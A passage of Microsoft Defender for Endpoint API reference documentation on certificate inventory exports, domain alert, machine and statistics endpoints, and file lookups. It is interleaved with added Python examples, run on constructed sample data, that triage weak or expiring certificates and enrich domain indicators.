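SAMPLE_BLOBS = {
    VALID_URL: _gz([
        {"DeviceId": "dev-a", "DeviceGatheredInfo": {"avMode": "0", "avIsSignatureUpToDate": "True"}},
        {"DeviceId": "dev-b", "DeviceGatheredInfo": {"avMode": "2", "avIsSignatureUpToDate": "False"}},
    ]),
    EXPIRED_URL: _gz([{"DeviceId": "dev-z", "DeviceGatheredInfo": {}}]),
}
NOW = datetime(2022, 8, 2, 23, 0, tzinfo=timezone.utc)   # constructed "current time"


def sample_download(url: str) -> bytes:
    """Stand-in for the blob GET: returns the constructed gzip blob for the URL."""
    return SAMPLE_BLOBS[url]


if __name__ == "__main__":
    for row in collect_av_info(SAMPLE_EXPORT, sample_download, NOW):
        print(row)
```

Checking `se` before downloading avoids a confusing 403 from storage halfway through a large export; if the list is stale, request a fresh one (the sasValidHours parameter controls how long the next set of URLs lives, up to the documented 24-hour maximum).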

Tip

Performance tip: Due to a variety of factors (examples listed below) Microsoft Defender Antivirus, like other antivirus software, can cause performance issues on endpoint devices. In some cases, you might need to tune the performance of Microsoft Defender Antivirus to alleviate those performance issues. Microsoft's Performance analyzer is a PowerShell command-line tool that helps determine which files, file paths, processes, and file extensions might be causing performance issues; some examples are:

Top paths that impact scan time
Top files that impact scan time
Top processes that impact scan time
Top file extensions that impact scan time
Combinations – for example:
  top files per extension
  top paths per extension
  top processes per path
  top scans per file
  top scans per file per process

You can use the information gathered using Performance analyzer to better assess performance issues and apply remediation actions. See: Performance analyzer for Microsoft Defender Antivirus.

See also
Export device health methods and properties

Device health and compliance reporting


Export certificate inventory per device
Article • 09/27/2023

Applies to:

Microsoft Defender for Endpoint Plan 1
Microsoft Defender for Endpoint Plan 2
Microsoft Defender Vulnerability Management
Microsoft Defender XDR

Want to experience Microsoft Defender Vulnerability Management? Learn more about how you can sign up to the Microsoft Defender Vulnerability Management public preview trial.

There are different API calls to get different types of data. In general, each API call contains the requisite data for devices in your organization.

JSON response: The API pulls all data in your organization as JSON responses. This method is best for small organizations with fewer than 100-K devices. The response is paginated, so you can use the @odata.nextLink field from the response to fetch the next results.

Via files: This API solution enables pulling larger amounts of data faster and more reliably, so it's recommended for large organizations with more than 100-K devices. This API pulls all data in your organization as download files. The response contains URLs to download all the data from Azure Storage. You can download data from Azure Storage as follows:
1. Call the API to get a list of download URLs with all your organization data.
2. Download all the files using the download URLs and process the data as you like.

Data that is collected using either method ('JSON response' or 'via files') is the current snapshot of the current state. It doesn't contain historic data. To collect historic data, customers must save the data in their own data storages.

Note

Unless indicated otherwise, all export security baseline assessment methods listed are full export and by device (also referred to as per device).

1. Export certificate assessment (JSON response)

1.1 API method description

Returns all certificate assessments for all devices, on a per-device basis. It returns a table with a separate entry for every unique combination of DeviceId, Thumbprint and Path.

1.1.1 Limitations

Maximum page size is 200,000.
Rate limitations for this API are 30 calls per minute and 1000 calls per hour.

1.2 Permissions
One of the following permissions is required to call this API. To learn more, including how to choose permissions, see Use Microsoft Defender for Endpoint APIs for details.

Permission type | Permission | Permission display name
Application | Vulnerability.Read.All | 'Read Threat and Vulnerability Management software information'
Delegated (work or school account) | Vulnerability.Read | 'Read Threat and Vulnerability Management software information'

1.3 URL
HTTP

GET /api/machines/certificateAssessmentByMachine

1.4 Parameters
pageSize (default = 50,000): Number of results in response.
$top: Number of results to return (doesn't return @odata.nextLink and so doesn't pull all the data).

1.5 Properties (JSON response)

Note

Each record is approximately 1 KB of data. You should take this into account when choosing the correct pageSize parameter.

Some additional columns might be returned in the response. These columns are temporary and might be removed. Only use the documented columns.

The properties defined in the following table are listed alphabetically by property ID. When running this API, the resulting output will not necessarily be returned in the same order listed in this table.

Property (ID) | Data type | Description
DeviceId | String | Unique identifier for the device in the service.
DeviceName | String | Fully qualified domain name (FQDN) of the device.
Thumbprint | Boolean | Unique identifier for the certificate.
Path | String | The location of the certificate.
SignatureAlgorithm | String | Hashing algorithm and encryption algorithm used.
KeySize | String | Size of the key used in the signature algorithm.
ExpirationDate | String | The date and time beyond which the certificate is no longer valid.
IssueDate | String | The earliest date and time when the certificate became valid.
SubjectType | String | Indicates if the holder of the certificate is a CA or end entity.
SerialNumber | String | Unique identifier for the certificate within a certificate authority's systems.
IssuedTo | Object | Entity that a certificate belongs to; can be a device, an individual, or an organization.
IssuedBy | Object | Entity that verified the information and signed the certificate.
KeyUsage | String | The valid cryptographic uses of the certificate's public key.
ExtendedKeyUsage | String | Other valid uses for the certificate.
RbacGroupId | String | The role-based access control (RBAC) group id.
RbacGroupName | String | The role-based access control (RBAC) group. If this device isn't assigned to any RBAC groups, the value will be "Unassigned." If the organization doesn't contain any RBAC groups, the value will be "None."

1.6 Example

1.6.1 Request example

HTTP

GET https://api.securitycenter.microsoft.com/api/machines/CertificateAssessmentByMachine

1.6.2 Response example

JSON

{
"@odata.context":"https://127.0.0.1/api/$metadata#Collection(microsoft.windowsDefenderATP.api.AssetCertificateAssessment)",
"value":[
{
"deviceId":"49126b9e4a5473b5229c73799e9e55c48668101b",
"deviceName":"testmachine5",
"thumbprint":"A4B37F4F6DE956922273D5CB8E7E0AAFB7033B90",
"path":"LocalMachine\\TestSignRoot\\A4B37F4F6DE956922273D5CB8E7E0AAFB7033B90",
"signatureAlgorithm":"sha384ECDSA",
"keyLength":0,
"notAfter":"0001-01-01T00:00:00Z",
"notBefore":"0001-01-01T00:00:00Z",
"subjectType":"CA",
"serialNumber":"6086A185EAFA2B9943B4671603F40323",
"subjectObject":null,
"issuerObject":null,
"keyUsageArray":null,
"extendedKeyUsageArray":null,
"isSelfSigned":false,
"rbacGroupId":4226,
"rbacGroupName":"testO6343398Gq31"}],
"@odata.nextLink":"https://127.0.0.1/api/machines/CertificateAssessmentByMachine?pagesize=1&$skiptoken=eyJFeHBvcnREZWZpbml0aW9uIjp7IlRpbWVQYXRoIjoiMjAyMi0wMy0yMS8wNTAxLyJ9LCJFeHBvcnRGaWxlSW5kZXgiOjAsIkxpbmVTdG9wcGVkQXQiOjF9"
}
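The certificate export is an inventory, not a verdict: the records carry the signature algorithm, key length, validity window, subject type and self-signed flag, and it is up to the consumer to turn those into findings. The triage below is an added example (not Microsoft's code): the first record mirrors the response above, where the validity dates come back as 0001-01-01 when they were not collected; the other records, the thresholds (MD5/SHA-1 as weak, RSA under 2048 bits as short, a 30-day expiry window) and the "EndEntity" subject type string are my own constructions. The same function applies to the per-line records of the via-files export.

```python
"""Triage records from the certificate assessment export.

Added example, not Microsoft's code. The records are constructed in the shape
of the JSON response above; the rules (MD5/SHA-1 signatures as weak, RSA below
2048 bits as short, a 30-day expiry window, a self-signed end-entity
certificate as suspicious) are my thresholds, not the product's.
"""
from datetime import datetime, timedelta, timezone
from typing import Dict, List

WEAK_DIGESTS = ("md5", "sha1")
MIN_RSA_BITS = 2048
EXPIRY_WINDOW = timedelta(days=30)
# The response uses 0001-01-01T00:00:00Z where validity dates were not collected.
UNSET = datetime(1, 1, 1, tzinfo=timezone.utc)


def parse_ts(value: str) -> datetime:
    return datetime.strptime(value, "%Y-%m-%dT%H:%M:%SZ").replace(tzinfo=timezone.utc)


def triage(cert: dict, now: datetime) -> List[str]:
    """Findings for one certificate record; an empty list means nothing to report."""
    findings = []
    algo = (cert.get("signatureAlgorithm") or "").lower()   # e.g. "sha1RSA", "sha384ECDSA"
    if any(algo.startswith(d) for d in WEAK_DIGESTS):
        findings.append(f"weak-signature:{cert['signatureAlgorithm']}")
    bits = cert.get("keyLength") or 0                         # 0 = not reported
    if "rsa" in algo and 0 < bits < MIN_RSA_BITS:
        findings.append(f"short-rsa-key:{bits}")
    not_before = parse_ts(cert.get("notBefore") or "0001-01-01T00:00:00Z")
    not_after = parse_ts(cert.get("notAfter") or "0001-01-01T00:00:00Z")
    if UNSET in (not_before, not_after):
        findings.append("validity-unknown")
    elif not_before > now:
        findings.append("not-yet-valid")
    elif not_after < now:
        findings.append("expired")
    elif not_after - now < EXPIRY_WINDOW:
        findings.append("expires-soon")
    # A self-signed CA in a root store is normal; a self-signed leaf usually is not.
    if cert.get("isSelfSigned") and cert.get("subjectType") != "CA":
        findings.append("self-signed-end-entity")
    return findings


def triage_report(records: List[dict], now: datetime) -> Dict[str, Dict[str, List[str]]]:
    """deviceName -> thumbprint -> findings; duplicate (thumbprint, path) rows collapse."""
    report: Dict[str, Dict[str, List[str]]] = {}
    for rec in records:
        findings = triage(rec, now)
        if findings:
            report.setdefault(rec["deviceName"], {})[rec["thumbprint"]] = findings
    return report


# --- constructed sample records ------------------------------------------------
NOW = datetime(2022, 3, 20, 13, 18, tzinfo=timezone.utc)   # constructed "current time"
SAMPLE_RECORDS = [
    {   # mirrors the documented response row: validity dates not collected
        "deviceName": "testmachine5", "thumbprint": "A4B37F4F6DE956922273D5CB8E7E0AAFB7033B90",
        "path": "LocalMachine\\TestSignRoot\\A4B37F4F6DE956922273D5CB8E7E0AAFB7033B90",
        "signatureAlgorithm": "sha384ECDSA", "keyLength": 0, "subjectType": "CA",
        "notBefore": "0001-01-01T00:00:00Z", "notAfter": "0001-01-01T00:00:00Z", "isSelfSigned": False,
    },
    {   # constructed: legacy 1024-bit SHA-1 certificate that has already expired
        "deviceName": "fileserver01", "thumbprint": "0000000000000000000000000000000000000001",
        "path": "LocalMachine\\My\\0000000000000000000000000000000000000001",
        "signatureAlgorithm": "sha1RSA", "keyLength": 1024, "subjectType": "EndEntity",
        "notBefore": "2015-01-01T00:00:00Z", "notAfter": "2020-01-01T00:00:00Z", "isSelfSigned": False,
    },
    {   # constructed: sound certificate, but it expires inside the 30-day window
        "deviceName": "fileserver01", "thumbprint": "0000000000000000000000000000000000000002",
        "path": "LocalMachine\\My\\0000000000000000000000000000000000000002",
        "signatureAlgorithm": "sha256RSA", "keyLength": 2048, "subjectType": "EndEntity",
        "notBefore": "2021-04-01T00:00:00Z", "notAfter": "2022-04-01T00:00:00Z", "isSelfSigned": False,
    },
    {   # constructed: self-signed leaf certificate in a user store
        "deviceName": "devbox7", "thumbprint": "0000000000000000000000000000000000000003",
        "path": "CurrentUser\\My\\0000000000000000000000000000000000000003",
        "signatureAlgorithm": "sha256RSA", "keyLength": 4096, "subjectType": "EndEntity",
        "notBefore": "2022-01-01T00:00:00Z", "notAfter": "2032-01-01T00:00:00Z", "isSelfSigned": True,
    },
]

if __name__ == "__main__":
    for device, certs in triage_report(SAMPLE_RECORDS, NOW).items():
        for thumb, why in certs.items():
            print(device, thumb, ", ".join(why))
```

Because the export is a snapshot with no history, "expires-soon" is only useful if you run this on every export and keep your own record of what was already reported, as the article notes for historic data in general.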

2. Export certificate assessment (via files)

2.1 API method description

Returns all certificate assessments for all devices, on a per-device basis. It returns a table with a separate entry for every unique combination of DeviceId, Thumbprint and Path.

2.1.1 Limitations

Rate limitations for this API are 5 calls per minute and 20 calls per hour.

2.2 Permissions
One of the following permissions is required to call this API. To learn more, including how to choose permissions, see Use Microsoft Defender for Endpoint APIs for details.

Permission type | Permission | Permission display name
Application | Vulnerability.Read.All | 'Read Threat and Vulnerability Management software information'
Delegated (work or school account) | Vulnerability.Read | 'Read Threat and Vulnerability Management software information'

2.3 URL
HTTP

GET /api/machines/certificateAssessmentExport

2.4 Parameters
sasValidHours: The number of hours that the download URLs will be valid for (Maximum 24 hours).

2.5 Properties (JSON response)

Note

The files are gzip compressed & in multiline Json format.

The download URLs are only valid for 3 hours; otherwise, you can use the parameter.

To maximize download speeds, make sure you are downloading the data from the same Azure region where your data resides.

Each record is approximately 1KB of data. You should take this into account when choosing the pageSize parameter that works for you.

Some additional columns might be returned in the response. These columns are temporary and might be removed. Only use the documented columns.

Property (ID) | Data type | Description
Export files | String[array] | A list of download URLs for files holding the current snapshot of the organization.
GeneratedTime | DateTime | The time the export was generated.

2.6 Example

2.6.1 Request example

HTTP

GET https://api.securitycenter.contoso.com/api/machines/certificateAssessmentExport

2.6.2 Response example
JSON

{
"@odata.context":"https://127.0.0.1/api/$metadata#microsoft.windowsDefenderATP.api.ExportFilesResponse",
"exportFiles":
["https://tvmexportexternalstgeus.blob.core.windows.net/temp-5c080622-f613-42bb-9fee-e17ccdff90d3/2022-03-20/1318/CertificateAssessmentExport/json/OrgId=47d41a0c-188d-46d3-bbea-a93dbc0bfcaa/_RbacGroupId=4226/part-00000-65a62a9d-7a01-4d78-bbdb-6d3e07b34cc9.c000.json.gz?sv=2020-02-10&st=2022-03-20T13%3A35%3A37Z&se=2022-03-20T16%3A35%3A37Z&sr=b&sp=r&sig=IMmwTOYmGvU0ei5AHLNAxnFCmZkE2jvBHzRmuAu9xaA%3D",
"https://tvmexportexternalstgeus.blob.core.windows.net/temp-5c080622-f613-42bb-9fee-e17ccdff90d3/2022-03-20/1318/CertificateAssessmentExport/json/OrgId=47d41a0c-188d-46d3-bbea-a93dbc0bfcaa/_RbacGroupId=4414/part-00000-65a62a9d-7a01-4d78-bbdb-6d3e07b34cc9.c000.json.gz?sv=2020-02-10&st=2022-03-20T13%3A35%3A37Z&se=2022-03-20T16%3A35%3A37Z&sr=b&sp=r&sig=2r0y74WZsATa0DjQTwfBxNqL5vN2Wl0AZKHMNrxuJ30%3D",
"https://tvmexportexternalstgeus.blob.core.windows.net/temp-5c080622-f613-42bb-9fee-e17ccdff90d3/2022-03-20/1318/CertificateAssessmentExport/json/OrgId=47d41a0c-188d-46d3-bbea-a93dbc0bfcaa/_RbacGroupId=75/part-00000-65a62a9d-7a01-4d78-bbdb-6d3e07b34cc9.c000.json.gz?sv=2020-02-10&st=2022-03-20T13%3A35%3A37Z&se=2022-03-20T16%3A35%3A37Z&sr=b&sp=r&sig=uVdY4%2BBpMdPMwaD3G0RJTZkS4R9J8oN8I3tu%2FOcG35c%3D"],
"generatedTime":"2022-03-20T13:18:00Z"
}


Get domain-related alerts API
Article • 11/15/2023

Applies to:

Microsoft Defender for Endpoint Plan 1
Microsoft Defender for Endpoint Plan 2
Microsoft Defender XDR

Want to experience Microsoft Defender for Endpoint? Sign up for a free trial.

Note

If you are a US Government customer, please use the URIs listed in Microsoft Defender for Endpoint for US Government customers.

Tip

For better performance, you can use a server closer to your geo location:

api-us.securitycenter.microsoft.com
api-eu.securitycenter.microsoft.com
api-uk.securitycenter.microsoft.com
api-au.securitycenter.microsoft.com

API description
Retrieves a collection of Alerts related to a given domain address.

Limitations
You can query on alerts last updated according to your configured retention period.
Rate limitations for this API are 100 calls per minute and 1500 calls per hour.

Permissions
One of the following permissions is required to call this API. To learn more, including how to choose permissions, see Use Microsoft Defender for Endpoint APIs.

Permission type | Permission | Permission display name
Application | Alert.Read.All | 'Read all alerts'
Application | Alert.ReadWrite.All | 'Read and write all alerts'
Delegated (work or school account) | Alert.Read | 'Read alerts'
Delegated (work or school account) | Alert.ReadWrite | 'Read and write alerts'

Note

When obtaining a token using user credentials:

The user needs to have at least the following role permission: 'View Data' (See Create and manage roles for more information).
Response will include only alerts, associated with devices, that the user has access to, based on device group settings (See Create and manage device groups for more information).

Device group creation is supported in Defender for Endpoint Plan 1 and Plan 2.

HTTP request
HTTP

GET /api/domains/{domain}/alerts

Request headers

Header | Value
Authorization | String

Request body
Empty

Response
If successful and domain exists - 200 OK with list of alert entities. If domain does not exist - 200 OK with an empty set.

Example

Request
Here's an example of the request.

HTTP

GET https://api.securitycenter.microsoft.com/api/domains/client.wns.windows.com/alerts


Get domain-related machines API
Article • 11/15/2023

Applies to:

Microsoft Defender for Endpoint Plan 1
Microsoft Defender for Endpoint Plan 2
Microsoft Defender XDR

Want to experience Microsoft Defender for Endpoint? Sign up for a free trial.

Note

If you are a US Government customer, please use the URIs listed in Microsoft Defender for Endpoint for US Government customers.

Tip

For better performance, you can use a server closer to your geo location:

api-us.securitycenter.microsoft.com
api-eu.securitycenter.microsoft.com
api-uk.securitycenter.microsoft.com
api-au.securitycenter.microsoft.com

API description
Retrieves a collection of Machines that have communicated to or from a given domain address.

Limitations
1. You can query on devices last updated according to your configured retention period.
2. Rate limitations for this API are 100 calls per minute and 1500 calls per hour.

Permissions
One of the following permissions is required to call this API. To learn more, including how to choose permissions, see Use Microsoft Defender for Endpoint APIs.

Permission type | Permission | Permission display name
Application | Machine.Read.All | 'Read all machine profiles'
Application | Machine.ReadWrite.All | 'Read and write all machine information'
Delegated (work or school account) | Machine.Read | 'Read machine information'
Delegated (work or school account) | Machine.ReadWrite | 'Read and write machine information'

Note

When obtaining a token using user credentials:

The user needs to have at least the following role permission: 'View Data' (For more information, see Create and manage roles).
Response will include only devices that the user can access, based on device group settings (For more information, see Create and manage device groups).

Device group creation is supported in Defender for Endpoint Plan 1 and Plan 2.

HTTP request
HTTP

GET /api/domains/{domain}/machines

Request headers

Name | Type | Description
Authorization | String | Bearer {token}. Required.

Request body
Empty

Response
If successful and domain exists - 200 OK with list of machine entities. If domain doesn't exist - 200 OK with an empty set.

Example

Request
Here's an example of the request.

HTTP

GET https://api.securitycenter.microsoft.com/api/domains/api.securitycenter.microsoft.com/machines


Get domain statistics API
Article • 09/27/2023

Applies to:

Microsoft Defender for Endpoint Plan 1
Microsoft Defender for Endpoint Plan 2
Microsoft Defender XDR

Want to experience Microsoft Defender for Endpoint? Sign up for a free trial.

Note

If you are a US Government customer, please use the URIs listed in Microsoft Defender for Endpoint for US Government customers.

Tip

For better performance, you can use a server closer to your geo location:

api-us.securitycenter.microsoft.com
api-eu.securitycenter.microsoft.com
api-uk.securitycenter.microsoft.com
api-au.securitycenter.microsoft.com

API description
Retrieves the statistics on the given domain.

Limitations
1. Rate limitations for this API are 100 calls per minute and 1500 calls per hour.
2. The maximum value for lookbackhours is 720 hours (30 days).

Permissions
One of the following permissions is required to call this API. To learn more, including how to choose permissions, see Use Microsoft Defender for Endpoint APIs.

Permission type | Permission | Permission display name
Application | URL.Read.All | 'Read URLs'
Delegated (work or school account) | URL.Read.All | 'Read URLs'

Note

When obtaining a token using user credentials:

The user needs to have at least the following role permission: 'View Data' (For more information, see Create and manage roles).

HTTP request
HTTP

GET /api/domains/{domain}/stats

Request headers

Header | Value
Authorization | Bearer {token}. Required.

Request URI parameters

Name | Type | Description
lookBackHours | Int32 | Defines the hours we search back to get the statistics. Defaults to 30 days. Optional.

Request body
Empty

Response
If successful and domain exists - 200 OK, with statistics object in the response body. If domain doesn't exist - 200 OK with a prevalence set to 0.

Example

Request example
Here's an example of the request.

HTTP

GET https://api.securitycenter.microsoft.com/api/domains/example.com/stats?lookBackHours=48

Response example
Here's an example of the response.

JSON

{
"@odata.context": "https://api.securitycenter.microsoft.com/api/$metadata#microsoft.windowsDefenderATP.api.InOrgDomainStats",
"host": "example.com",
"organizationPrevalence": 4070,
"orgFirstSeen": "2017-07-30T13:23:48Z",
"orgLastSeen": "2017-08-29T13:09:05Z"
}
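The three domain endpoints documented above (alerts, machines and stats) are typically used together when an analyst enriches a domain indicator: stats is the cheapest signal and, since an unknown domain comes back 200 OK with prevalence 0 rather than 404, it also decides whether the heavier machine and alert lookups are worth making. The client below is an added example, not Microsoft's code. `fetch_json` is a hypothetical stand-in for an authenticated GET; the responses are constructed (the stats shape follows the response example above, while the `computerDnsName` field on machine entities and `id`/`severity` on alert entities are assumed from those resource types, not from these articles). The domain goes into the URL path, so the client validates it as a bare hostname before building the request.

```python
"""Enrich a domain indicator with /api/domains/{domain}/stats, /machines and /alerts.

Added example, not Microsoft's code. `fetch_json` is a hypothetical callable
for an authenticated GET (bearer token in the Authorization header); the
responses below are constructed. Field names on machine and alert entities
are assumed from those resource types.
"""
import re
from typing import Callable, Dict
from urllib.parse import quote

BASE_URL = "https://api.securitycenter.microsoft.com"
MAX_LOOKBACK_HOURS = 720   # 30 days, the documented maximum for lookBackHours
# RFC 1123 hostname: labels of 1-63 alphanumerics/hyphens, 253 characters overall.
_HOSTNAME = re.compile(r"^(?=.{1,253}$)[a-z0-9]([a-z0-9-]{0,61}[a-z0-9])?(\.[a-z0-9]([a-z0-9-]{0,61}[a-z0-9])?)*$")


def normalize_domain(domain: str) -> str:
    """Lower-case, drop a trailing dot and refuse anything that is not a bare
    hostname, so schemes, paths or '..' never end up inside the request path."""
    d = domain.strip().lower().rstrip(".")
    if not _HOSTNAME.match(d):
        raise ValueError(f"not a valid domain name: {domain!r}")
    return d


def domain_profile(fetch_json: Callable[[str], dict], domain: str, lookback_hours: int = 48) -> Dict[str, object]:
    """Stats first; only pull machines and alerts for domains the organization has actually seen."""
    if not 1 <= lookback_hours <= MAX_LOOKBACK_HOURS:
        raise ValueError(f"lookBackHours must be between 1 and {MAX_LOOKBACK_HOURS}")
    d = quote(normalize_domain(domain), safe="")
    stats = fetch_json(f"{BASE_URL}/api/domains/{d}/stats?lookBackHours={lookback_hours}")
    prevalence = stats.get("organizationPrevalence") or 0
    if prevalence == 0:
        # Documented behaviour: an unknown domain still returns 200 OK, with prevalence 0.
        return {"domain": d, "seen": False, "prevalence": 0, "machines": [], "alerts": []}
    machines = fetch_json(f"{BASE_URL}/api/domains/{d}/machines").get("value", [])
    alerts = fetch_json(f"{BASE_URL}/api/domains/{d}/alerts").get("value", [])
    return {
        "domain": d,
        "seen": True,
        "prevalence": prevalence,
        "first_seen": stats.get("orgFirstSeen"),
        "last_seen": stats.get("orgLastSeen"),
        "machines": sorted(m.get("computerDnsName", "") for m in machines),
        "alerts": [(a.get("id"), a.get("severity")) for a in alerts],
    }


# --- constructed responses, keyed by the URL the client builds ------------------
SAMPLE_RESPONSES = {
    f"{BASE_URL}/api/domains/example.com/stats?lookBackHours=48": {
        "host": "example.com", "organizationPrevalence": 4070,
        "orgFirstSeen": "2017-07-30T13:23:48Z", "orgLastSeen": "2017-08-29T13:09:05Z",
    },
    f"{BASE_URL}/api/domains/example.com/machines": {
        "value": [{"computerDnsName": "ws-042"}, {"computerDnsName": "ws-007"}],
    },
    f"{BASE_URL}/api/domains/example.com/alerts": {
        "value": [{"id": "alert-id-placeholder", "severity": "Medium"}],   # constructed alert
    },
    f"{BASE_URL}/api/domains/never-seen.example/stats?lookBackHours=48": {
        "host": "never-seen.example", "organizationPrevalence": 0,
        "orgFirstSeen": None, "orgLastSeen": None,
    },
}


def sample_fetch(url: str) -> dict:
    """Stand-in for the authenticated GET: looks the URL up in the constructed responses."""
    return SAMPLE_RESPONSES[url]


if __name__ == "__main__":
    print(domain_profile(sample_fetch, "Example.COM."))
    print(domain_profile(sample_fetch, "never-seen.example"))
```

When the token was obtained with user credentials, the machine and alert lists are already filtered to the device groups that user can see, so two analysts with different device-group scopes can get different answers for the same domain; the prevalence figure from stats is not scoped that way.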


File resource type
Article • 02/23/2024

Applies to:

Microsoft Defender for Endpoint Plan 1
Microsoft Defender for Endpoint Plan 2

Want to experience Microsoft Defender for Endpoint? Sign up for a free trial.

Note

If you are a US Government customer, please use the URIs listed in Microsoft Defender for Endpoint for US Government customers.

Tip

For better performance, you can use a server closer to your geo location:

api-us.securitycenter.microsoft.com
api-eu.securitycenter.microsoft.com
api-uk.securitycenter.microsoft.com
api-au.securitycenter.microsoft.com

Represents a file entity in Defender for Endpoint.

Methods

Method | Return Type | Description
Get file | file | Get a single file
List file related alerts | alert collection | Get the alert entities that are associated with the file.
List file related machines | machine collection | Get the machine entities associated with the alert.
file statistics | Statistics summary | Retrieves the prevalence for the given file.

Properties

Property | Type | Description
sha1 | String | Sha1 hash of the file content
sha256 | String | Sha256 hash of the file content
globalPrevalence | Nullable long | File prevalence across organization
globalFirstObserved | DateTimeOffset | First time the file was observed
globalLastObserved | DateTimeOffset | Last time the file was observed
size | Nullable long | Size of the file
fileType | String | Type of the file
isPeFile | Boolean | true if the file is portable executable (for example DLL, EXE, etc.)
filePublisher | String | File publisher
fileProductName | String | Product name
signer | String | File signer
issuer | String | File issuer
signerHash | String | Hash of the signing certificate
isValidCertificate | Boolean | Was signing certificate successfully verified by Microsoft Defender for Endpoint agent
determinationType | String | The determination type of the file
determinationValue | String | Determination value

Json representation
JSON
{
"sha1": "4388963aaa83afe2042a46a3c017ad50bdcdafb3",
"sha256": "413c58c8267d2c8648d8f6384bacc2ae9c929b2b96578b6860b5087cd1bd6462",
"globalPrevalence": 180022,
"globalFirstObserved": "2017-09-19T03:51:27.6785431Z",
"globalLastObserved": "2020-01-06T03:59:21.3229314Z",
"size": 22139496,
"fileType": "APP",
"isPeFile": true,
"filePublisher": "CHENGDU YIWO Tech Development Co., Ltd.",
"fileProductName": "EaseUS MobiSaver for Android",
"signer": "CHENGDU YIWO Tech Development Co., Ltd.",
"issuer": "VeriSign Class 3 Code Signing 2010 CA",
"signerHash": "6c3245d4a9bc0244d99dff27af259cbbae2e2d16",
"isValidCertificate": false,
"determinationType": "Pua",
"determinationValue": "PUA:Win32/FusionCore"
}
```

Tip

Do you want to learn more? Engage with the Microsoft Security community in our Tech Community: Microsoft Defender for Endpoint Tech Community.


Get file information API
Article • 09/27/2023

Applies to:

Microsoft Defender for Endpoint Plan 1
Microsoft Defender for Endpoint Plan 2
Microsoft Defender XDR

Want to experience Microsoft Defender for Endpoint? Sign up for a free trial.

Note

If you are a US Government customer, please use the URIs listed in Microsoft Defender for Endpoint for US Government customers.

Tip

For better performance, you can use a server closer to your geo location:

api-us.securitycenter.microsoft.com
api-eu.securitycenter.microsoft.com
api-uk.securitycenter.microsoft.com
api-au.securitycenter.microsoft.com

API description
Retrieves a file by identifier (SHA-1 or SHA-256).

Limitations
1. Rate limitations for this API are 100 calls per minute and 1500 calls per hour.

Permissions
One of the following permissions is required to call this API. To learn more, including how to choose permissions, see Use Microsoft Defender for Endpoint APIs.

Permission type | Permission | Permission display name
Application | File.Read.All | 'Read all file profiles'
Delegated (work or school account) | File.Read.All | 'Read all file profiles'

Note

When obtaining a token using user credentials, the user needs to have at least the following role permission: 'View Data' (for more information, see Create and manage roles).

HTTP request
HTTP

GET /api/files/{id}

Request headers

Name | Type | Description
Authorization | String | Bearer {token}. Required.

Request body
Empty

Response
If successful and file exists - 200 OK with the file entity in the body. If file doesn't exist -
404 Not Found.

Example
Request example
Here's an example of the request.

HTTP

GET https://api.securitycenter.microsoft.com/api/files/4388963aaa83afe2042a46a3c017ad50bdcdafb3

Response example
Here's an example of the response.

JSON

{
  "@odata.context": "https://api.securitycenter.microsoft.com/api/$metadata#Files/$entity",
  "sha1": "4388963aaa83afe2042a46a3c017ad50bdcdafb3",
  "sha256": "413c58c8267d2c8648d8f6384bacc2ae9c929b2b96578b6860b5087cd1bd6462",
  "globalPrevalence": 180022,
  "globalFirstObserved": "2017-09-19T03:51:27.6785431Z",
  "globalLastObserved": "2020-01-06T03:59:21.3229314Z",
  "size": 22139496,
  "fileType": "APP",
  "isPeFile": true,
  "filePublisher": "CHENGDU YIWO Tech Development Co., Ltd.",
  "fileProductName": "EaseUS MobiSaver for Android",
  "signer": "CHENGDU YIWO Tech Development Co., Ltd.",
  "issuer": "VeriSign Class 3 Code Signing 2010 CA",
  "signerHash": "6c3245d4a9bc0244d99dff27af259cbbae2e2d16",
  "isValidCertificate": false,
  "determinationType": "Pua",
  "determinationValue": "PUA:Win32/FusionCore"
}


Get file-related alerts API
Article • 09/27/2023

Applies to:

Microsoft Defender for Endpoint Plan 1
Microsoft Defender for Endpoint Plan 2
Microsoft Defender XDR

Want to experience Microsoft Defender for Endpoint? Sign up for a free trial.

Note

If you are a US Government customer, please use the URIs listed in Microsoft Defender for Endpoint for US Government customers.

Tip

For better performance, you can use a server closer to your geo location:

api-us.securitycenter.microsoft.com
api-eu.securitycenter.microsoft.com
api-uk.securitycenter.microsoft.com
api-au.securitycenter.microsoft.com

API description
Retrieves a collection of alerts related to a given file hash.

Limitations
1. Rate limitations for this API are 100 calls per minute and 1500 calls per hour.
2. Only SHA-1 Hash Function is supported (not MD5 or SHA-256).

Permissions
One of the following permissions is required to call this API. To learn more, including how to choose permissions, see Use Defender for Endpoint APIs.

Permission type | Permission | Permission display name
Application | Alert.Read.All | 'Read all alerts'
Application | Alert.ReadWrite.All | 'Read and write all alerts'
Delegated (work or school account) | Alert.Read | 'Read alerts'
Delegated (work or school account) | Alert.ReadWrite | 'Read and write alerts'

Note

When obtaining a token using user credentials:

The user needs to have at least the following role permission: 'View Data' (for more information, see Create and manage roles).
The response includes only alerts associated with devices that the user has access to, based on device group settings (for more information, see Create and manage device groups).

Device group creation is supported in Defender for Endpoint Plan 1 and Plan 2.

HTTP request
HTTP

GET /api/files/{id}/alerts

Request headers

Name | Type | Description
Authorization | String | Bearer {token}. Required.

Request body
Empty

Response
If successful and file exists - 200 OK with list of alert entities in the body. If file doesn't
exist - 200 OK with an empty set.

Example

Request
Here's an example of the request.

HTTP

GET https://api.securitycenter.microsoft.com/api/files/6532ec91d513acc05f43ee0aa3002599729fd3e1/alerts


Get file-related machines API
Article • 09/27/2023

Applies to:

Microsoft Defender for Endpoint Plan 1
Microsoft Defender for Endpoint Plan 2

Want to experience Microsoft Defender for Endpoint? Sign up for a free trial.

Note

If you are a US Government customer, please use the URIs listed in Microsoft Defender for Endpoint for US Government customers.

Tip

For better performance, you can use a server closer to your geo location:

api-us.securitycenter.microsoft.com
api-eu.securitycenter.microsoft.com
api-uk.securitycenter.microsoft.com
api-au.securitycenter.microsoft.com

API description
Retrieves a collection of Machines related to a given file hash.

Limitations
1. Rate limitations for this API are 100 calls per minute and 1500 calls per hour.
2. Only SHA-1 Hash Function is supported (not MD5 or SHA-256).

Permissions
One of the following permissions is required to call this API. To learn more, including how to choose permissions, see Use Microsoft Defender for Endpoint APIs.

Permission type | Permission | Permission display name
Application | Machine.Read.All | 'Read all machine profiles'
Application | Machine.ReadWrite.All | 'Read and write all machine information'
Delegated (work or school account) | Machine.Read | 'Read machine information'
Delegated (work or school account) | Machine.ReadWrite | 'Read and write machine information'

Note

When obtaining a token using user credentials:

The user needs to have at least the following role permission: 'View Data' (for more information, see Create and manage roles).
